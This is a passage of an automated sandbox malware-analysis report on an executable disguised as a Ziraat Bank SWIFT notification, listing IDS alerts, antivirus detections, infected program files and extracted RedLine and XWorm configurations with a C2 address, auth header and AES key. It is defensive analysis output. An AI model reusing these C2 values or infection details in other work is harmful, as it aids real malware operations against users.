2025-03-21T15:10:34.646334+0100	2037771	1	A Network Trojan was detected	13.213.51.196	80	192.168.2.4	49779	TCP
2025-03-21T15:10:38.550605+0100	2037771	1	A Network Trojan was detected	52.26.80.133	80	192.168.2.4	49787	TCP
2025-03-21T15:10:46.946069+0100	2037771	1	A Network Trojan was detected	52.212.150.54	80	192.168.2.4	49795	TCP

ETPRO MALWARE Win32/Expiro.NDO CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-21T15:08:48.098209+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.4	49724	72.52.178.23	80	TCP
2025-03-21T15:10:20.308014+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.4	49755	13.213.51.196	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280hv

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": ["204.10.161.147:7082"], "Bot Id": "success", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["204.10.161.147"], "Port": 7081, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for submitted file

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Virustotal: Detection: 79%			Perma Link
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	ReversingLabs: Detection: 86%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 204.10.161.147
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 7081
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XWorm V5.6
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: %AppData%
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XClient.exe

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1253422637.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdbL source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: RegSvcs.exe, 00000013.00000002.1452607862.0000000003085000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: alg.exe, 00000002.00000003.2007802565.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vws\dll\mscorlib.pdb source: RegSvcs.exe, 00000013.00000002.1440773629.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1671146289.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000002.00000003.1649365761.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbL" source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, build.exe, 0000000A.00000002.2603046672.0000000006620000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\Locator.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to behavior
